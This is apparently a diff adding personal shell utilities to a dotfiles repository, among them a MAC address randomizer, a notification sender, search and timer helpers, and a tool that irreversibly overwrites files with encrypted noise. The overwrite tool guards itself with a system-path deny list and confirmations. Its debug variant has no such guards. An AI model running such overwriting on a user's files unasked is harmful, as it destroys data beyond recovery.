#!/bin/bash
|
||||
# randomize-mac - Randomize MAC addresses for privacy
|
||||
# Usage: sudo randomize-mac
|
||||
|
||||
set -euo pipefail
|
||||
|
||||
ETHERNET="enp3s0"
|
||||
WIFI="wlp4s0"
|
||||
|
||||
# Check if running as root
|
||||
if [ "$EUID" -ne 0 ]; then
|
||||
echo "❌ This script must be run as root (use sudo)"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
echo "🔄 Randomizing MAC addresses..."
|
||||
echo ""
|
||||
|
||||
# Randomize Ethernet
|
||||
echo "📡 Ethernet ($ETHERNET):"
|
||||
if ip link show $ETHERNET &>/dev/null; then
|
||||
echo " └─ Before: $(ip link show $ETHERNET | grep ether | awk '{print $2}')"
|
||||
if macchanger -r $ETHERNET 2>/dev/null; then
|
||||
echo " └─ After: $(ip link show $ETHERNET | grep ether | awk '{print $2}')"
|
||||
echo " └─ ✅ Randomized successfully"
|
||||
else
|
||||
echo " └─ ⚠️ Failed (interface may be in use)"
|
||||
fi
|
||||
else
|
||||
echo " └─ ⚠️ Interface not found"
|
||||
fi
|
||||
|
||||
echo ""
|
||||
|
||||
# Randomize WiFi
|
||||
echo "📶 WiFi ($WIFI):"
|
||||
if ip link show $WIFI &>/dev/null; then
|
||||
echo " └─ Before: $(ip link show $WIFI | grep ether | awk '{print $2}')"
|
||||
if macchanger -r $WIFI 2>/dev/null; then
|
||||
echo " └─ After: $(ip link show $WIFI | grep ether | awk '{print $2}')"
|
||||
echo " └─ ✅ Randomized successfully"
|
||||
else
|
||||
echo " └─ ⚠️ Failed (interface may be disabled or in use)"
|
||||
fi
|
||||
else
|
||||
echo " └─ ⚠️ Interface not found"
|
||||
fi
|
||||
|
||||
echo ""
|
||||
echo "⚠️ NOTE: You may need to reconnect to your network after randomization!"
|
||||
echo ""
|
||||
echo "💡 TIP: WiFi ($WIFI) is currently disabled. This script will randomize it"
|
||||
echo " when you enable WiFi, preventing tracking on public networks."
|
||||
14
scripts/receive-file.bat
Normal file
14
scripts/receive-file.bat
Normal file
|
|
@ -0,0 +1,14 @@
|
|||
@echo off
|
||||
echo ════════════════════════════════════════
|
||||
echo FILE RECEIVER - Djedi Consulting
|
||||
echo ════════════════════════════════════════
|
||||
echo.
|
||||
set /p CODE="Enter the code I gave you: "
|
||||
echo.
|
||||
echo Downloading file...
|
||||
croc.exe %CODE%
|
||||
echo.
|
||||
echo ════════════════════════════════════════
|
||||
echo File downloaded to Downloads folder!
|
||||
echo Press any key to close...
|
||||
pause
|
||||
18
scripts/rfv
Executable file
18
scripts/rfv
Executable file
|
|
@ -0,0 +1,18 @@
|
|||
#!/usr/bin/env bash
|
||||
|
||||
# Switch between Ripgrep launcher mode (CTRL-R) and fzf filtering mode (CTRL-F)
|
||||
rm -f /tmp/rg-fzf-{r,f}
|
||||
RG_PREFIX="rg --column --line-number --no-heading --color=always --smart-case "
|
||||
INITIAL_QUERY="${*:-}"
|
||||
fzf --ansi --disabled --query "$INITIAL_QUERY" \
|
||||
--bind "start:reload($RG_PREFIX {q})+unbind(ctrl-r)" \
|
||||
--bind "change:reload:sleep 0.1; $RG_PREFIX {q} || true" \
|
||||
--bind "ctrl-f:unbind(change,ctrl-f)+change-prompt(2. fzf> )+enable-search+rebind(ctrl-r)+transform-query(echo {q} > /tmp/rg-fzf-r; cat /tmp/rg-fzf-f)" \
|
||||
--bind "ctrl-r:unbind(ctrl-r)+change-prompt(1. ripgrep> )+disable-search+reload($RG_PREFIX {q} || true)+rebind(change,ctrl-f)+transform-query(echo {q} > /tmp/rg-fzf-f; cat /tmp/rg-fzf-r)" \
|
||||
--color "hl:-1:underline,hl+:-1:underline:reverse" \
|
||||
--prompt '1. ripgrep> ' \
|
||||
--delimiter : \
|
||||
--header '╱ CTRL-R (ripgrep mode) ╱ CTRL-F (fzf mode) ╱' \
|
||||
--preview 'bat --color=always {1} --highlight-line {2}' \
|
||||
--preview-window 'up,60%,border-bottom,+{2}+3/3,~3' \
|
||||
--bind 'enter:become(hx {1} +{2})'
|
||||
11
scripts/rn
Executable file
11
scripts/rn
Executable file
|
|
@ -0,0 +1,11 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: rn
|
||||
# Description: Display current time, date, and calendar
|
||||
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||
# Usage: rn
|
||||
|
||||
date "+%l:%M%p on %A, %B %e, %Y"
|
||||
echo
|
||||
cal | grep -E --color=always "\b$(date '+%e')\b|$"
|
||||
7
scripts/rsync-vps-backup.sh
Executable file
7
scripts/rsync-vps-backup.sh
Executable file
|
|
@ -0,0 +1,7 @@
|
|||
#!/bin/bash
|
||||
|
||||
# cron
|
||||
# 0 3 * * 1 /home/youruser/scripts/rsync-n8n-backup.sh
|
||||
|
||||
rsync -avz yourvpsuser@yourvpsip:/home/yourvpsuser/n8n-compose/n8n-data-backup.tar.gz /home/youruser/backups/n8n/
|
||||
|
||||
20
scripts/running
Executable file
20
scripts/running
Executable file
|
|
@ -0,0 +1,20 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: running
|
||||
# Description: Better process search with PID highlighting
|
||||
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||
# Usage: running
|
||||
# running firefox
|
||||
# running python
|
||||
|
||||
process_list="$(ps -eo 'pid command')"
|
||||
|
||||
if [[ $# != 0 ]]; then
|
||||
process_list="$(echo "$process_list" | grep -Fiw "$@")"
|
||||
fi
|
||||
|
||||
echo "$process_list" |
|
||||
grep -Fv "${BASH_SOURCE[0]}" |
|
||||
grep -Fv grep |
|
||||
GREP_COLORS='mt=00;35' grep -E --colour=auto '^\s*[[:digit:]]+'
|
||||
247
scripts/secure-overwrite-files
Executable file
247
scripts/secure-overwrite-files
Executable file
|
|
@ -0,0 +1,247 @@
|
|||
#!/bin/bash
|
||||
# secure-overwrite-files - Securely overwrite files with encrypted random data
|
||||
# ⚠️ WARNING: THIS PERMANENTLY DESTROYS DATA - USE WITH EXTREME CAUTION
|
||||
#
|
||||
# Usage:
|
||||
# secure-overwrite-files --dry-run /path/to/files # See what would happen
|
||||
# secure-overwrite-files /path/to/files # Actually overwrite
|
||||
|
||||
set -euo pipefail
|
||||
|
||||
# Detect WSL and set compatibility flags
|
||||
IS_WSL=false
|
||||
if grep -qiE '(microsoft|wsl)' /proc/version 2>/dev/null || [ -n "${WSL_DISTRO_NAME:-}" ]; then
|
||||
IS_WSL=true
|
||||
fi
|
||||
|
||||
# Colors for warnings
|
||||
RED='\033[0;31m'
|
||||
YELLOW='\033[1;33m'
|
||||
GREEN='\033[0;32m'
|
||||
NC='\033[0m' # No Color
|
||||
|
||||
# Configuration
|
||||
DRY_RUN=false
|
||||
TARGET_DIR=""
|
||||
|
||||
# Parse arguments
|
||||
while [[ $# -gt 0 ]]; do
|
||||
case $1 in
|
||||
--dry-run)
|
||||
DRY_RUN=true
|
||||
shift
|
||||
;;
|
||||
--help|-h)
|
||||
cat <<EOF
|
||||
Secure File Overwriting Tool
|
||||
|
||||
Usage:
|
||||
$0 --dry-run /path/to/files # Preview what would happen
|
||||
$0 /path/to/files # Actually overwrite files
|
||||
|
||||
⚠️ WARNING: This PERMANENTLY DESTROYS data by overwriting with encrypted random noise.
|
||||
This is IRREVERSIBLE. Ensure you have backups before proceeding.
|
||||
|
||||
Safety Features:
|
||||
- Requires explicit directory path (won't work in current directory by accident)
|
||||
- Multiple confirmation prompts
|
||||
- Dry-run mode to preview actions
|
||||
- Skips system directories and hidden files
|
||||
- Shows file list before proceeding
|
||||
|
||||
Use Cases:
|
||||
- Overwriting sensitive files in cloud storage before deletion
|
||||
- Securely erasing data from external drives
|
||||
- Preparing media for disposal
|
||||
|
||||
EOF
|
||||
exit 0
|
||||
;;
|
||||
*)
|
||||
TARGET_DIR="$1"
|
||||
shift
|
||||
;;
|
||||
esac
|
||||
done
|
||||
|
||||
# Validate target directory
|
||||
if [ -z "$TARGET_DIR" ]; then
|
||||
echo -e "${RED}❌ ERROR: No target directory specified${NC}"
|
||||
echo "Usage: $0 [--dry-run] /path/to/files"
|
||||
echo "Run with --help for more information"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
if [ ! -d "$TARGET_DIR" ]; then
|
||||
echo -e "${RED}❌ ERROR: Directory does not exist: $TARGET_DIR${NC}"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Convert to absolute path
|
||||
TARGET_DIR=$(cd "$TARGET_DIR" && pwd)
|
||||
|
||||
# Safety check: Don't allow certain dangerous paths
|
||||
DANGEROUS_PATHS=(
|
||||
"/"
|
||||
"/home"
|
||||
"/etc"
|
||||
"/usr"
|
||||
"/var"
|
||||
"/bin"
|
||||
"/sbin"
|
||||
"/boot"
|
||||
"$HOME"
|
||||
"$HOME/.ssh"
|
||||
"$HOME/.gnupg"
|
||||
)
|
||||
|
||||
for dangerous in "${DANGEROUS_PATHS[@]}"; do
|
||||
if [ "$TARGET_DIR" = "$dangerous" ]; then
|
||||
echo -e "${RED}❌ DANGER: Refusing to operate on system directory: $TARGET_DIR${NC}"
|
||||
echo "This would destroy your system!"
|
||||
exit 1
|
||||
fi
|
||||
done
|
||||
|
||||
# Get list of files (skip hidden files and directories)
|
||||
# Using portable array building that works on WSL, Linux, and any bash 3.2+
|
||||
FILES=()
|
||||
while IFS= read -r -d '' file; do
|
||||
FILES+=("$file")
|
||||
done < <(find "$TARGET_DIR" -maxdepth 1 -type f ! -name ".*" -print0)
|
||||
|
||||
if [ ${#FILES[@]} -eq 0 ]; then
|
||||
echo -e "${YELLOW}⚠️ No files found in: $TARGET_DIR${NC}"
|
||||
exit 0
|
||||
fi
|
||||
|
||||
# Display warnings and file list
|
||||
echo ""
|
||||
echo -e "${RED}╔════════════════════════════════════════════════════════════╗${NC}"
|
||||
echo -e "${RED}║ ⚠️ SECURE FILE OVERWRITE - IRREVERSIBLE DATA DESTRUCTION ║${NC}"
|
||||
echo -e "${RED}╚════════════════════════════════════════════════════════════╝${NC}"
|
||||
echo ""
|
||||
echo -e "${YELLOW}Target Directory:${NC} $TARGET_DIR"
|
||||
echo -e "${YELLOW}Files to overwrite:${NC} ${#FILES[@]}"
|
||||
if [ "$IS_WSL" = true ]; then
|
||||
echo -e "${YELLOW}Environment:${NC} WSL (Windows Subsystem for Linux)"
|
||||
fi
|
||||
echo ""
|
||||
echo "The following files will be PERMANENTLY DESTROYED:"
|
||||
echo ""
|
||||
|
||||
for file in "${FILES[@]}"; do
|
||||
filename=$(basename "$file")
|
||||
filesize=$(du -h "$file" | cut -f1)
|
||||
echo " 📄 $filename ($filesize)"
|
||||
done
|
||||
|
||||
echo ""
|
||||
|
||||
if [ "$DRY_RUN" = true ]; then
|
||||
echo -e "${GREEN}🔍 DRY RUN MODE - No files will be modified${NC}"
|
||||
echo ""
|
||||
echo "What would happen:"
|
||||
echo " 1. Each file above would be overwritten with encrypted random data"
|
||||
echo " 2. Original content would be permanently destroyed"
|
||||
echo " 3. Files would remain with same names but contain only encrypted noise"
|
||||
echo ""
|
||||
echo "To actually perform this operation, run:"
|
||||
echo " $0 $TARGET_DIR"
|
||||
echo ""
|
||||
exit 0
|
||||
fi
|
||||
|
||||
# First confirmation
|
||||
echo -e "${RED}⚠️ THIS WILL PERMANENTLY DESTROY ${#FILES[@]} FILES!${NC}"
|
||||
echo ""
|
||||
read -p "Are you ABSOLUTELY SURE you want to continue? Type 'YES' in all caps: " confirm1
|
||||
|
||||
if [ "$confirm1" != "YES" ]; then
|
||||
echo -e "${GREEN}✅ Aborted. No files were modified.${NC}"
|
||||
exit 0
|
||||
fi
|
||||
|
||||
# Second confirmation with directory name
|
||||
echo ""
|
||||
echo -e "${RED}⚠️ FINAL CONFIRMATION${NC}"
|
||||
echo "You are about to overwrite all files in:"
|
||||
echo " $TARGET_DIR"
|
||||
echo ""
|
||||
read -p "Type the full directory path to confirm: " confirm2
|
||||
|
||||
if [ "$confirm2" != "$TARGET_DIR" ]; then
|
||||
echo -e "${GREEN}✅ Aborted. Path did not match. No files were modified.${NC}"
|
||||
exit 0
|
||||
fi
|
||||
|
||||
# Third confirmation - countdown
|
||||
echo ""
|
||||
echo -e "${RED}Beginning file destruction in:${NC}"
|
||||
for i in 5 4 3 2 1; do
|
||||
echo " $i..."
|
||||
sleep 1
|
||||
done
|
||||
echo ""
|
||||
|
||||
# Perform the overwriting
|
||||
echo -e "${YELLOW}🔄 Overwriting files with encrypted random data...${NC}"
|
||||
echo ""
|
||||
|
||||
SUCCESS_COUNT=0
|
||||
FAIL_COUNT=0
|
||||
|
||||
for file in "${FILES[@]}"; do
|
||||
filename=$(basename "$file")
|
||||
filesize=$(stat -c%s "$file")
|
||||
|
||||
# Determine size in MB (minimum 1MB)
|
||||
size_mb=$(( (filesize / 1048576) + 1 ))
|
||||
if [ $size_mb -lt 1 ]; then
|
||||
size_mb=1
|
||||
fi
|
||||
|
||||
printf " 📄 %s ... " "$filename"
|
||||
|
||||
# Flush output immediately
|
||||
sync 2>/dev/null || true
|
||||
|
||||
# Create encrypted random data with same name
|
||||
if dd if=/dev/urandom bs=1M count=$size_mb 2>/dev/null | \
|
||||
gpg --symmetric --cipher-algo AES256 --batch \
|
||||
--passphrase "$(openssl rand -base64 32)" > "${file}.tmp" 2>/dev/null; then
|
||||
|
||||
# Verify temp file was created
|
||||
if [ ! -f "${file}.tmp" ]; then
|
||||
printf "${RED}✗ Failed (temp file not created)${NC}\n"
|
||||
((FAIL_COUNT++)) || true
|
||||
continue
|
||||
fi
|
||||
|
||||
# Replace original with encrypted noise (both variables fully quoted)
|
||||
if mv "${file}.tmp" "${file}"; then
|
||||
printf "${GREEN}✓ Destroyed${NC}\n"
|
||||
((SUCCESS_COUNT++)) || true
|
||||
else
|
||||
printf "${RED}✗ Failed (mv error: $?)${NC}\n"
|
||||
((FAIL_COUNT++)) || true
|
||||
rm -f "${file}.tmp" 2>/dev/null || true
|
||||
fi
|
||||
else
|
||||
printf "${RED}✗ Failed (encryption error)${NC}\n"
|
||||
((FAIL_COUNT++)) || true
|
||||
rm -f "${file}.tmp" 2>/dev/null || true
|
||||
fi
|
||||
done
|
||||
|
||||
echo ""
|
||||
echo "═══════════════════════════════════════"
|
||||
echo -e "${GREEN}✅ Complete${NC}"
|
||||
echo " Successfully destroyed: $SUCCESS_COUNT files"
|
||||
if [ $FAIL_COUNT -gt 0 ]; then
|
||||
echo -e " ${RED}Failed: $FAIL_COUNT files${NC}"
|
||||
fi
|
||||
echo ""
|
||||
echo "⚠️ Original data is now PERMANENTLY UNRECOVERABLE"
|
||||
echo "You can now delete these files from cloud storage."
|
||||
echo ""
|
||||
72
scripts/secure-overwrite-files-debug
Executable file
72
scripts/secure-overwrite-files-debug
Executable file
|
|
@ -0,0 +1,72 @@
|
|||
#!/bin/bash
|
||||
# DEBUG VERSION - Shows exactly what commands are being run
|
||||
# Usage: secure-overwrite-files-debug /path/to/directory
|
||||
|
||||
set -euo pipefail
|
||||
set -x # Print every command before executing
|
||||
|
||||
TARGET_DIR="$1"
|
||||
|
||||
if [ ! -d "$TARGET_DIR" ]; then
|
||||
echo "ERROR: Not a directory: $TARGET_DIR"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
TARGET_DIR=$(cd "$TARGET_DIR" && pwd)
|
||||
|
||||
mapfile -t FILES < <(find "$TARGET_DIR" -maxdepth 1 -type f ! -name ".*")
|
||||
|
||||
echo "Found ${#FILES[@]} files:"
|
||||
for file in "${FILES[@]}"; do
|
||||
echo " - $file"
|
||||
done
|
||||
|
||||
echo ""
|
||||
echo "Processing files..."
|
||||
|
||||
for file in "${FILES[@]}"; do
|
||||
filename=$(basename "$file")
|
||||
filesize=$(stat -c%s "$file")
|
||||
|
||||
size_mb=$(( (filesize / 1048576) + 1 ))
|
||||
if [ $size_mb -lt 1 ]; then
|
||||
size_mb=1
|
||||
fi
|
||||
|
||||
echo ""
|
||||
echo "=== Processing: $filename ==="
|
||||
echo " Full path: $file"
|
||||
echo " Size: ${filesize} bytes"
|
||||
echo " Will create: ${size_mb}MB encrypted file"
|
||||
echo " Temp file: ${file}.tmp"
|
||||
|
||||
echo -n " Creating encrypted data... "
|
||||
if dd if=/dev/urandom bs=1M count=$size_mb 2>/dev/null | \
|
||||
gpg --symmetric --cipher-algo AES256 --batch \
|
||||
--passphrase "$(openssl rand -base64 32)" > "${file}.tmp" 2>/dev/null; then
|
||||
echo "✓"
|
||||
|
||||
echo " Temp file created:"
|
||||
ls -lh "${file}.tmp"
|
||||
|
||||
echo -n " Moving temp to final location... "
|
||||
echo " Command: mv \"${file}.tmp\" \"${file}\""
|
||||
|
||||
if mv "${file}.tmp" "${file}"; then
|
||||
echo "✓ SUCCESS"
|
||||
echo " Final file:"
|
||||
ls -lh "$file"
|
||||
else
|
||||
echo "✗ FAILED"
|
||||
echo " ERROR CODE: $?"
|
||||
ls -la "${file}.tmp" "$file" 2>&1 || true
|
||||
fi
|
||||
else
|
||||
echo "✗ FAILED to create encrypted file"
|
||||
fi
|
||||
done
|
||||
|
||||
echo ""
|
||||
echo "=== COMPLETE ==="
|
||||
echo "Final directory state:"
|
||||
ls -lah "$TARGET_DIR"
|
||||
84
scripts/send-ntfy
Executable file
84
scripts/send-ntfy
Executable file
|
|
@ -0,0 +1,84 @@
|
|||
#!/bin/bash
|
||||
# send-ntfy - Send notification via ntfy using credentials from ~/.env
|
||||
|
||||
set -euo pipefail
|
||||
|
||||
# Load credentials from ~/.env
|
||||
if [ -f "$HOME/.env" ]; then
|
||||
set -a
|
||||
source "$HOME/.env"
|
||||
set +a
|
||||
else
|
||||
echo "Error: ~/.env not found" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Check for URL
|
||||
if [ -z "${NTFY_URL:-}" ]; then
|
||||
echo "Error: NTFY_URL must be set in ~/.env" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Add https:// if missing
|
||||
if [[ ! "$NTFY_URL" =~ ^https?:// ]]; then
|
||||
NTFY_URL="https://$NTFY_URL"
|
||||
fi
|
||||
|
||||
# Parse arguments
|
||||
TOPIC="${1:-alerts}"
|
||||
MESSAGE="${2:-}"
|
||||
TITLE="${3:-}"
|
||||
PRIORITY="${4:-default}"
|
||||
TAGS="${5:-}"
|
||||
|
||||
if [ -z "$MESSAGE" ]; then
|
||||
echo "Usage: send-ntfy <topic> <message> [title] [priority] [tags]" >&2
|
||||
echo "" >&2
|
||||
echo "Examples:" >&2
|
||||
echo " send-ntfy alerts 'Backup completed'" >&2
|
||||
echo " send-ntfy security 'Suspicious login' 'Security Alert' urgent 'warning,shield'" >&2
|
||||
echo " send-ntfy personal 'Meeting in 5 minutes'" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Build full URL with topic
|
||||
FULL_URL="$NTFY_URL/$TOPIC"
|
||||
|
||||
# Build curl options array
|
||||
CURL_OPTS=(
|
||||
-s
|
||||
--http1.1
|
||||
-w "\n%{http_code}"
|
||||
-d "$MESSAGE"
|
||||
)
|
||||
|
||||
# Add authentication
|
||||
if [ -n "${NTFY_TOKEN:-}" ]; then
|
||||
CURL_OPTS+=(-H "Authorization: Bearer $NTFY_TOKEN")
|
||||
elif [ -n "${NTFY_AUTH:-}" ]; then
|
||||
CURL_OPTS+=(-u "$NTFY_AUTH")
|
||||
else
|
||||
echo "Error: NTFY_TOKEN or NTFY_AUTH must be set in ~/.env" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Add optional headers
|
||||
[ -n "$TITLE" ] && CURL_OPTS+=(-H "Title: $TITLE")
|
||||
[ -n "$PRIORITY" ] && CURL_OPTS+=(-H "Priority: $PRIORITY")
|
||||
[ -n "$TAGS" ] && CURL_OPTS+=(-H "Tags: $TAGS")
|
||||
|
||||
# Send notification
|
||||
RESULT=$(curl "${CURL_OPTS[@]}" "$FULL_URL" 2>&1)
|
||||
|
||||
# Extract HTTP code
|
||||
HTTP_CODE=$(echo "$RESULT" | tail -1)
|
||||
RESPONSE=$(echo "$RESULT" | sed '$d')
|
||||
|
||||
if [ "$HTTP_CODE" = "200" ]; then
|
||||
echo "✅ Notification sent to $TOPIC"
|
||||
exit 0
|
||||
else
|
||||
echo "❌ Failed: HTTP $HTTP_CODE" >&2
|
||||
[ -n "$RESPONSE" ] && echo "Response: $RESPONSE" >&2
|
||||
exit 1
|
||||
fi
|
||||
30
scripts/serveit
Executable file
30
scripts/serveit
Executable file
|
|
@ -0,0 +1,30 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: serveit
|
||||
# Description: Quick static file server on localhost
|
||||
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||
# Usage: serveit [port] # defaults to 8000
|
||||
|
||||
port='8000'
|
||||
if [[ $# -eq 1 ]]; then
|
||||
port="$1"
|
||||
fi
|
||||
|
||||
if hash php 2>/dev/null; then
|
||||
exec php -S "localhost:$port"
|
||||
elif hash python3 2>/dev/null; then
|
||||
exec python3 -m http.server "$port"
|
||||
elif hash python 2>/dev/null; then
|
||||
major_version="$(python -c 'import platform as p;print(p.python_version_tuple()[0])')"
|
||||
if [[ "$major_version" == '3' ]]; then
|
||||
exec python -m http.server "$port"
|
||||
else
|
||||
exec python -m SimpleHTTPServer "$port"
|
||||
fi
|
||||
elif hash ruby 2>/dev/null; then
|
||||
exec ruby -run -e httpd . -p "$port"
|
||||
else
|
||||
echo 'unable to start HTTP server' >&2
|
||||
exit 1
|
||||
fi
|
||||
13
scripts/sleepybear
Executable file
13
scripts/sleepybear
Executable file
|
|
@ -0,0 +1,13 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: sleepybear
|
||||
# Description: Put system to sleep
|
||||
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||
# Usage: sleepybear
|
||||
|
||||
if [[ "$(uname)" == 'Darwin' ]]; then
|
||||
exec /usr/bin/osascript -e 'tell application "System Events" to sleep'
|
||||
else
|
||||
systemctl suspend
|
||||
fi
|
||||
48
scripts/speak
Executable file
48
scripts/speak
Executable file
|
|
@ -0,0 +1,48 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: speak
|
||||
# Description: Text-to-speech with ElevenLabs/Piper/espeak support
|
||||
# Source: Enhanced from https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||
# Usage: echo "text" | speak
|
||||
# speak < file.txt
|
||||
# cat README.md | speak
|
||||
|
||||
# Strip markdown if pandoc is available
|
||||
if command -v pandoc &>/dev/null; then
|
||||
text=$(pandoc -f commonmark -t plain --wrap=preserve)
|
||||
else
|
||||
text=$(cat)
|
||||
fi
|
||||
|
||||
# Try voice systems in order of preference:
|
||||
# 1. ElevenLabs (best quality, requires API)
|
||||
# 2. Piper (good quality, local)
|
||||
# 3. espeak-ng (fallback)
|
||||
# 4. say (macOS)
|
||||
|
||||
if command -v elevenlabs &>/dev/null && [[ -n "${ELEVENLABS_API_KEY:-}" ]]; then
|
||||
# Use ElevenLabs (highest quality)
|
||||
echo "$text" | elevenlabs tts --voice "Adam" --play
|
||||
elif command -v piper &>/dev/null; then
|
||||
# Use Piper (good local TTS)
|
||||
# Look for installed voice models
|
||||
piper_voice_dir="$HOME/.local/share/piper/voices"
|
||||
if [[ -f "$piper_voice_dir/en_US-amy-medium.onnx" ]]; then
|
||||
echo "$text" | piper --model "$piper_voice_dir/en_US-amy-medium.onnx" --output-raw | aplay -r 22050 -f S16_LE -t raw -
|
||||
else
|
||||
echo "Error: Piper voice model not found at $piper_voice_dir" >&2
|
||||
echo "Download with: piper --download-dir $piper_voice_dir --download en_US-amy-medium" >&2
|
||||
exit 1
|
||||
fi
|
||||
elif hash espeak-ng 2>/dev/null; then
|
||||
# Use espeak-ng (basic but reliable)
|
||||
echo "$text" | espeak-ng
|
||||
elif hash say 2>/dev/null; then
|
||||
# Use macOS say
|
||||
echo "$text" | say
|
||||
else
|
||||
echo "Error: No TTS program found" >&2
|
||||
echo "Install one of: piper, espeak-ng, or set ELEVENLABS_API_KEY" >&2
|
||||
exit 1
|
||||
fi
|
||||
10
scripts/straightquote
Executable file
10
scripts/straightquote
Executable file
|
|
@ -0,0 +1,10 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: straightquote
|
||||
# Description: Convert curly/smart quotes to straight quotes
|
||||
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||
|
||||
# Convert left/right double quotes to straight double quotes
|
||||
# Convert left/right single quotes to straight single quotes
|
||||
tr '""''' '""'"'"''
|
||||
40
scripts/timer
Executable file
40
scripts/timer
Executable file
|
|
@ -0,0 +1,40 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: timer
|
||||
# Description: Countdown timer with audio and notification
|
||||
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||
# Usage: timer 5m
|
||||
# timer 30s
|
||||
# timer 1h
|
||||
|
||||
if [[ $# -ne 1 ]]; then
|
||||
echo "Usage: timer <duration>" >&2
|
||||
echo "Examples: timer 5m, timer 30s, timer 1h" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
duration="$1"
|
||||
|
||||
# Show countdown timer with gum if available
|
||||
if command -v gum &>/dev/null; then
|
||||
echo "⏱️ Timer started for $duration"
|
||||
sleep "$duration"
|
||||
else
|
||||
echo "⏱️ Timer started for $duration (sleeping...)"
|
||||
sleep "$duration"
|
||||
fi
|
||||
|
||||
# Play notification sound if available
|
||||
if command -v paplay &>/dev/null && [[ -f /usr/share/sounds/freedesktop/stereo/complete.oga ]]; then
|
||||
paplay /usr/share/sounds/freedesktop/stereo/complete.oga &
|
||||
elif command -v aplay &>/dev/null && [[ -f /usr/share/sounds/freedesktop/stereo/complete.wav ]]; then
|
||||
aplay /usr/share/sounds/freedesktop/stereo/complete.wav &
|
||||
fi
|
||||
|
||||
# Send desktop notification
|
||||
if command -v notify-send &>/dev/null; then
|
||||
notify-send "⏰ Timer Complete" "Timer finished: $duration"
|
||||
fi
|
||||
|
||||
echo "✅ Timer complete: $duration"
|
||||
23
scripts/tmux-claude-code.sh
Executable file
23
scripts/tmux-claude-code.sh
Executable file
|
|
@ -0,0 +1,23 @@
|
|||
#!/usr/bin/env bash
|
||||
# tmux-claude-code.sh - Smart Claude Code launcher for tmux
|
||||
#
|
||||
# Finds existing Claude Code tmux window or creates new one
|
||||
# Usage: tmux-claude-code.sh
|
||||
|
||||
# Check if Claude Code is running in tmux
|
||||
CLAUDE_WINDOW=$(tmux list-windows -F '#{window_name}' 2>/dev/null | grep -iE "claude|code" | head -1)
|
||||
|
||||
if [ -n "$CLAUDE_WINDOW" ]; then
|
||||
# Found existing window - switch to it
|
||||
tmux select-window -t "$CLAUDE_WINDOW"
|
||||
|
||||
# Focus the Ghostty window
|
||||
wmctrl -a ghostty 2>/dev/null || xdotool search --class ghostty windowactivate 2>/dev/null
|
||||
|
||||
echo "Switched to existing Claude Code window: $CLAUDE_WINDOW"
|
||||
else
|
||||
# No Claude Code window found - create new tmux window
|
||||
tmux new-window -n "claude-code" "claude-code"
|
||||
|
||||
echo "Created new Claude Code window"
|
||||
fi
|
||||
28
scripts/trash
Executable file
28
scripts/trash
Executable file
|
|
@ -0,0 +1,28 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: trash
|
||||
# Description: Move files to trash instead of permanent deletion
|
||||
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||
# Credit: macOS implementation modified from https://github.com/morgant/tools-osx
|
||||
# Usage: trash file1 file2 dir1
|
||||
|
||||
if [[ $# -eq 0 ]]; then
|
||||
echo "Usage: trash <file1> [file2] ..." >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
if [[ "$(uname)" == 'Darwin' ]]; then
|
||||
# macOS: Use AppleScript through Finder
|
||||
for arg in "$@"; do
|
||||
file="$(realpath "$arg")"
|
||||
/usr/bin/osascript -e "tell application \"Finder\" to delete POSIX file \"$file\"" > /dev/null
|
||||
done
|
||||
else
|
||||
# Linux: Use gio trash
|
||||
if ! command -v gio &>/dev/null; then
|
||||
echo "Error: 'gio' command not found. Install glib2 package." >&2
|
||||
exit 1
|
||||
fi
|
||||
gio trash "$@"
|
||||
fi
|
||||
15
scripts/tryna
Executable file
15
scripts/tryna
Executable file
|
|
@ -0,0 +1,15 @@
|
|||
#!/usr/bin/env bash
|
||||
set -u
|
||||
|
||||
# Script Name: tryna
|
||||
# Description: Retry command until success (every 0.5s)
|
||||
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||
# Credit: Evan Hahn - https://codeberg.org/EvanHahn/dotfiles
|
||||
# Usage: tryna curl https://example.com
|
||||
# tryna nc -zv localhost 8080
|
||||
|
||||
"$@"
|
||||
while [[ ! "$?" -eq 0 ]]; do
|
||||
sleep 0.5
|
||||
"$@"
|
||||
done
|
||||
15
scripts/trynafail
Executable file
15
scripts/trynafail
Executable file
|
|
@ -0,0 +1,15 @@
|
|||
#!/usr/bin/env bash
|
||||
set -u
|
||||
|
||||
# Script Name: trynafail
|
||||
# Description: Run command until it fails (every 0.5s)
|
||||
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||
# Credit: Evan Hahn - https://codeberg.org/EvanHahn/dotfiles
|
||||
# Usage: trynafail nc -zv localhost 8080 # monitor until service dies
|
||||
# trynafail curl -sf https://api.example.com/health
|
||||
